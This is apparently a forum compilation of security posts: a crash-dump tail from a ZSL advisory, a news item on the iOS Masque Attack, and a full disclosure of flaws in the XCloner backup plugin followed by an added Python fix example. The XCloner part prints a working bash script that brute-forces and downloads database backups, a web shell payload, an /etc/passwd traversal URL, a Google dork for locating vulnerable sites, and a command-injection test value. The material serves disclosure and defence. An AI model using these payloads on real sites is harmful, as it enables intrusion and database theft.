eax=13921178 ebx=00000003 ecx=00000000 edx=138fa270 esi=13c41e78 edi=00000002
eip=5fea43e4 esp=001eca8c ebp=131f67b8 iopl=0 nv up ei ng nz ac pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210297
CdrTxt!WStyleList::EndLoad+0x74:
5fea43e4 8b01 mov eax,dword ptr [ecx] ds:002b:00000000=????????
---

Tested on: Microsoft Windows 7 Professional SP1 (EN)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience

Advisory ID: ZSL-2014-5204
Advisory URL: [url]http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5204.php[/url]

27.10.2014

---

PoC:
- [url]http://www.zeroscience.mk/codes/zsl_5204.rar[/url]
- [url]http://www.exploit-db.com/sploits/35217.rar[/url]

Source: http://www.exploit-db.com/exploits/35217/
23. Android has been a long-time target for cyber criminals, but now it seems that they have turned their way towards iOS devices. Apple always says that hacking their devices is too difficult for cyber crooks, but a single app has made it possible for anyone to hack an iPhone.

A security flaw in Apple's mobile iOS operating system has made most iPhones and iPads vulnerable to cyber attacks by hackers seeking access to sensitive data and control of their devices, security researchers warned.

The details about this new vulnerability were published by the cyber security firm FireEye on its blog on Monday, saying the flaw allows hackers to access devices by fooling users into downloading and installing malicious iOS applications on their iPhone or iPad via tainted text messages, emails and Web links.

MASQUE ATTACK - REPLACING TRUSTED APPS
The malicious iOS apps can then be used to replace the legitimate apps, such as banking or social networking apps, that were installed through Apple's official App Store, through a technique that FireEye has dubbed "Masque Attack." Masque attacks can be used by cyber criminals to steal banking and email login credentials or users' other sensitive information.

Security researchers found that the Masque attack works on Apple's mobile operating system including iOS 7.1.1, 7.1.2, 8.0, 8.1, and the 8.1.1 beta version, and that all of the iPhones and iPads running iOS 7 or later, regardless of whether or not the device is jailbroken, are at risk. According to FireEye, the vast majority, i.e. 95 percent, of all iOS devices currently in use are potentially vulnerable to the attack.

MASQUE ATTACK IS MORE DANGEROUS THAN WIRELURKER
The Masque Attack technique is the same one used by "WireLurker," a malware attack discovered last week by security firm Palo Alto Networks targeting Apple users in China, that allowed unapproved apps designed to steal information to be downloaded from the Internet. But this recently-discovered malware threat is reportedly a "much bigger threat" than WireLurker.

HOW TO PROTECT YOURSELF FROM MASQUE ATTACK
Apple devices running iOS have long been considered safer from hackers than devices running OSes like Microsoft's Windows and Google's Android, but iOS has now become a more common target for cybercriminals. In order to avoid falling victim to Masque Attack, users can follow some simple steps given below:

- Do not download any apps offered to you via email, text messages, or web links.
- Don't install apps offered in pop-ups from third-party websites.
- If iOS alerts a user about an "Untrusted App Developer," click "Don't Trust" on the alert and immediately uninstall the application.

Source: Masque Attack — New iOS Vulnerability Allows Hackers to Replace Apps with Malware
24. @dcristi left a "trace". It would be good if you censored it.
25. Title: XCloner Wordpress/Joomla! backup Plugin v3.1.1 (Wordpress) v3.5.1 (Joomla!) Vulnerabilities
Author: Larry W. Cashdollar, @_larry0
Date: 10/17/2014
Download: https://wordpress.org/plugins/xcloner-backup-and-restore/
Download: http://extensions.joomla.org/extensions/access-a-security/site-security/backup/665
Downloads: Wordpress 313,647 Joomla! 515745 StandAlone 69175
Website: http://www.xcloner.com
Advisory: http://www.vapid.dhs.org/advisories/wordpress/plugins/Xcloner-v3.1.1/
Vendor: Notified 10/17/14 Ovidiu Liuta, @thinkovi Acknowledged & no other response.
CVEID: Requested, TBD.
OSVDBID: 114176, 114177, 114178, 114179, 114180

Description:
"XCloner is a Backup and Restore component designed for PHP/Mysql websites, it can work as a native plugin for WordPress and Joomla!."

Vulnerabilities:
There are multiple vulnerabilities I've discovered in this plugin, they are as follows.
1. Arbitrary command execution.
2. Clear text MySQL password exposure through html text box under configuration panel.
3. Database backups exposed to local users due to open file permissions.
4. Unauthenticated remote access to backup files via easily guessable file names.
5. Authenticated remote file access.
6. MySQL password exposed to process table.

Arbitrary Command Execution
The plugin allows arbitrary commands to be executed by an authenticated user. The user will require administrative access rights to back up the database. User input when specifying your own file name is not sanitized, as well as various other input fields.

PoC
All input fields, I believe, are vulnerable. I've chosen the backup filename and a wget of sh.txt, which is simply <?php passthru($_GET)?>, into a directory writeable by www-data. Screenshots available at the advisory URL above.

All user configurable variables are vulnerable; these variables need to be sanitized before being passed to the exec() function for execution.
$_CONFIG[tarpath]
$exclude
$_CONFIG['tarcompress']
$_CONFIG['filename']
$_CONFIG['exfile_tar']
$_CONFIG[sqldump]
$_CONFIG['mysql_host']
$_CONFIG['mysql_pass']
$_CONFIG['mysql_user']
$database_name
$sqlfile
$filename

Vulnerable code
./cloner.functions.php:
1672 exec($_CONFIG[tarpath] . " $exclude -c" . $_CONFIG['tarcompress'] . "vf $filename ./administrator/backups/index.html");
1673 exec($_CONFIG[tarpath] . " -" . $_CONFIG['tarcompress'] . "vf $filename --update ./administrator/backups/database-sql.sql");
1674 exec($_CONFIG[tarpath] . " -" . $_CONFIG['tarcompress'] . "vf $filename --update ./administrator/backups/htaccess.txt");
1675 exec($_CONFIG[tarpath] . " -" . $_CONFIG['tarcompress'] . "vf $filename --update ./administrator/backups/perm.txt");

1695- if ($_REQUEST[cron_dbonly] != 1) {
1696: exec($_CONFIG[tarpath] . " $excl_cmd " . " -X " . $_CONFIG['exfile_tar'] . " -chv" . $_CONFIG['tarcompress'] . "f $filename ./");
1697- } else {
1698-
1699-
1700: exec($_CONFIG[tarpath] . " -" . $_CONFIG['tarcompress'] . "cvf $filename ./administrator/backups/database-sql.sql");
1701-
1702- if (is_array($databases_incl)) {
1703- foreach ($databases_incl as $database_name)
1704- if ($database_name != "") {
1705: exec($_CONFIG[tarpath] . " -" . $_CONFIG['tarcompress'] . "vf $filename --update ./administrator/backups/" . $database_name . "-sql.sql");
1706- }
1707- }
1708- }
--
1873- {
1874- //$sizeInBytes = filesize($path);
1875- $sizeInBytes = sprintf("%u", filesize($path));
1876: if ((!$sizeInBytes) and (function_exists("exec"))){
1877- $command = "ls -l \"$path\" | cut -d \" \" -f 5";
1878: $sizeInBytes = @exec($command);
345- }
346-
347- return $sizeInBytes;

./restore/XCloner.php
290- }else{
291- if($ext == '.tgz') $compress = 'z';
292- else $compress = '';
293: shell_exec("tar -x".$compress."pf $file -C $_CONFIG[output_path]");
294- }
295-}

1077- if($_REQUEST['use_mysqldump'] == 1){
1078: echo shell_exec($_REQUEST['mysqldump_path']." -u ".$_REQUEST[mysql_username]." -p".$_REQUEST[mysql_pass]." -h ".$_REQUEST[mysql_server]." ".$_REQUEST[mysql_db]." < ".$sqlfile);
1079- return;
1080- }

Clear Text MySQL Database Password
The plugin also returns the MySQL clear text password via an html text box back to the user in the configuration panel. A password should never be repeated back to you in clear text. The plugin will happily send this over a clear text connection. Screenshots available at the advisory URL above.

Remote Database Download & Local File Permissions
The default recommended path for backup storage is /usr/share/wordpress/administrator/backups. An index.html file is created under this directory to prevent casual browsing; however, the file names are easily predictable.

From the installation instructions:
"XCloner is a tool that will help you manage your website backups, generate/restore/move so your website will be always secured! With XCloner you will be able to clone your site to any other location with just a few clicks. Don't forget to create the 'administrator/backups' directory in your Wordpress root and make it fully writeable."

The format of the filenames is:
backup_year-month-day_month_24hour_minute_domainname-sql-OPTIONS.tar
where OPTIONS could be either -sql-drop, -sql-nodrop or -nosql depending on options selected at the time of backup. The domain name is set by the HTTP_HOST header from line 88 of cloner.config.php:
88: $_CONFIG['mosConfig_live_site']=$_SERVER['HTTP_HOST'];

root@larry:/usr/share/wordpress/administrator/backups# ls -l
total 129432
-rw-r--r-- 1 www-data www-data 44177408 Oct 29 13:15 backup_2014-10-29_10-14_testsite-sql-nodrop.tar
-rw-r--r-- 1 www-data www-data 44177408 Oct 29 13:19 backup_2014-10-29_10-19_testsite-sql-nodrop.tar
-rw-r--r-- 1 www-data www-data 44177408 Oct 29 13:24 backup_2014-10-29_10-24_testsite-sql-nodrop.tar

These file permissions also expose the contents of the databases to any local system users.

The file naming convention code is as follows:
1327 $domainname = $_CONFIG['mosConfig_live_site'];
1351 if ($_REQUEST['bname'] == "") {
1352 if ($backupDatabase == 1) {
1353 if ($_REQUEST['dbbackup_drop']) {
1354 $filename1 = 'backup_' . date("Y-m-d_H-i") . '_' . $domainname . '-sql-drop' . $f_ext;
1355 } else {
1356
1357 $filename1 = 'backup_' . date("Y-m-d_H-i") . '_' . $domainname . '-sql-nodrop' . $f_ext;
1358 }
1359 } else
1360 $filename1 = 'backup_' . date("Y-m-d_H-i") . '_' . $domainname . '-nosql' . $f_ext;
1361 } else {

Screenshots available at the advisory URL above.

I've found a few vulnerable websites with the google dork:
[url]https://www.google.com/#q=inurl:+administrator%2Fbackups[/url]

A PoC:
lwc@wordpress:~$ bash exp.sh 192.168.0.26
[+] Location [url]http://192.168.0.26/administrator/backups/backup_2014-10-30_06-27_-sql-nodrop.tar[/url] Found
[+] Received HTTP/1.1 200 OK
Downloading......
--2014-10-30 13:02:51-- [url]http://192.168.0.26/administrator/backups/backup_2014-10-30_06-27_-sql-nodrop.tar[/url]
Connecting to 192.168.0.26:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 44400640 (42M) [application/x-tar]
Saving to: `backup_2014-10-30_06-27_-sql-nodrop.tar.1'
100%[========================================>] 44,400,640 56.9M/s in 0.7s
2014-10-30 13:02:52 (56.9 MB/s) - `backup_2014-10-30_06-27_-sql-nodrop.tar.1' saved [44400640/44400640]
[+] Location [url]http://192.168.0.26/administrator/backups/backup_2014-10-30_06-33_-sql-nodrop.tar[/url] Found
[+] Received HTTP/1.1 200 OK
Downloading......
--2014-10-30 13:02:52-- [url]http://192.168.0.26/administrator/backups/backup_2014-10-30_06-33_-sql-nodrop.tar[/url]
Connecting to 192.168.0.26:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 44400640 (42M) [application/x-tar]
Saving to: `backup_2014-10-30_06-33_-sql-nodrop.tar.1'
100%[========================================>] 44,400,640 64.1M/s in 0.7s
2014-10-30 13:02:53 (64.1 MB/s) - `backup_2014-10-30_06-33_-sql-nodrop.tar.1' saved [44400640/44400640]

#!/bin/bash
#Exploit to download XCloner v3.1.1 Database backups OSVDB: 114177
#Larry W. Cashdollar, @_larry0
#XCloner recommends a backup storage path under the WP root directory
#it uses a 0 size index.html file to block indexing.
#we can try to brute force the filenames it creates.
MONTH=10
DAY=30
#May need to set the DOMAIN to $1 the target depending on how WP is configured.
DOMAIN=
for y in `seq -w 0 23`; do      # hours 00-23 (date("H"))
  for x in `seq -w 0 59`; do    # minutes 00-59 (date("i"))
    CPATH="http://$1/administrator/backups/backup_2014-"$MONTH"-"$DAY"_"$y"-"$x"_$DOMAIN-sql-nodrop.tar";
    RESULT=`curl -s --head $CPATH|grep 200`;
    if [ -n "$RESULT" ]; then
      echo "[+] Location $CPATH Found";
      echo "[+] Received $RESULT";
      echo "Downloading......";
      wget $CPATH
    fi;
  done
done

Remote File Access
The user has to have administrative rights, but the backup downloader doesn't check the path for ../.
[url]http://192.168.0.33/wp-admin/admin-ajax.php?action=json_return&page=xcloner_show&option=com_cloner&task=download&file=../../../../etc/passwd[/url]
Will download /etc/passwd off the remote system.

MySQL Database Password Exposed to Process Table
Local users can steal the MySQL password by watching the process table:
lwc@wordpress:/etc/wordpress$ while (true); do ps -ef |grep [m]ysqldump; done
www-data 16691 8889 0 09:27 ? 00:00:00 sh -c mysqldump --quote-names -h localhost -u root -pPASSWORDHERE wordpress > /usr/share/wordpress/administrator/backups/database-sql.sql --allow-keywords
www-data 16692 16691 0 09:27 ? 00:00:00 mysqldump --quote-names -h localhost -u root -px xxxxxx wordpress --allow-keywords
www-data 16691 8889 0 09:27 ? 00:00:00 sh -c mysqldump --quote-names -h localhost -u root -ps3cur1ty wordpress > /usr/share/wordpress/administrator/backups/database-sql.sql --allow-keywords
www-data 16692 16691 0 09:27 ? 00:00:00 mysqldump --quote-names -h localhost -u root -px xxxxxx wordpress --allow-keywords
^C

Source: Joomla/WordPress XCloner Command Execution / Password Disclosure (Packet Storm)
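Three of the XCloner findings above (request values concatenated into `shell_exec()`, the MySQL password on the `mysqldump` command line, and the `../` download path) reduced to a small Python model, each beside a fixed form. This is an added example, not the plugin's code: the function names, the `BACKUP_ROOT` constant and the sample request values are assumptions, and the fix for the password relies on the real `MYSQL_PWD` environment variable and `--result-file` option that `mysqldump` supports.

```python
"""Added example (not XCloner's code): command injection, password on the
process table, and download path traversal, vulnerable form beside the fix."""
import os
import shlex

# XCloner's recommended backup location from the advisory (assumed here).
BACKUP_ROOT = "/usr/share/wordpress/administrator/backups"


# --- 1. command injection via string-built shell commands --------------------
def vulnerable_mysqldump_cmd(host, user, password, db, sqlfile):
    """Mirrors restore/XCloner.php line 1078: every field comes from $_REQUEST
    and is glued into one string that a shell then parses."""
    return "mysqldump -u %s -p%s -h %s %s > %s" % (user, password, host, db, sqlfile)


def fixed_mysqldump_cmd(host, user, password, db, sqlfile):
    """No shell at all: an argv list (each value is exactly one argument) and
    the password handed over in MYSQL_PWD, which mysqldump reads, so it never
    shows up in `ps`.  --result-file replaces the shell redirect."""
    argv = ["mysqldump", "--quote-names", "-h", host, "-u", user,
            "--result-file=" + sqlfile, "--", db]
    env = {"MYSQL_PWD": password}
    return argv, env


def quoted_shell_cmd(host, user, db, sqlfile):
    """When a shell string is unavoidable (PHP's escapeshellarg() equivalent):
    every untrusted value is quoted so metacharacters lose their meaning."""
    q = shlex.quote
    return "mysqldump -u %s -h %s %s > %s" % (q(user), q(host), q(db), q(sqlfile))


def shell_tokens(cmd):
    """How /bin/sh would split the command; used to show what becomes an argument."""
    return shlex.split(cmd)


# --- 2. path traversal in the backup downloader ------------------------------
def vulnerable_download_path(requested):
    """task=download&file=... joined straight onto the backup directory."""
    return os.path.normpath(os.path.join(BACKUP_ROOT, requested))


def safe_download_path(requested):
    """Accept only a bare file name and confirm the resolved path is a direct
    child of BACKUP_ROOT (realpath also collapses symlinks and '..')."""
    if requested in ("", ".", "..") or os.path.basename(requested) != requested:
        raise ValueError("only a plain backup file name is allowed")
    root = os.path.realpath(BACKUP_ROOT)
    full = os.path.realpath(os.path.join(root, requested))
    if os.path.dirname(full) != root:
        raise ValueError("path escapes the backup directory")
    return full


def is_download_allowed(requested):
    try:
        safe_download_path(requested)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    evil_db = "wordpress; id > /tmp/pwned"            # constructed attacker input
    print(vulnerable_mysqldump_cmd("localhost", "root", "s3cur1ty", evil_db, "out.sql"))
    print(fixed_mysqldump_cmd("localhost", "root", "s3cur1ty", evil_db, "out.sql"))
    print(shell_tokens(quoted_shell_cmd("localhost", "root", evil_db, "out.sql")))
    print(vulnerable_download_path("../../../../etc/passwd"))
    print(is_download_allowed("../../../../etc/passwd"),
          is_download_allowed("backup_2014-10-30_06-27_testsite-sql-nodrop.tar"))
```

The predictable-filename and world-readable-file findings are not addressed by code like this: they need a random component in the name, a storage directory outside the web root, and a restrictive umask on the backup files.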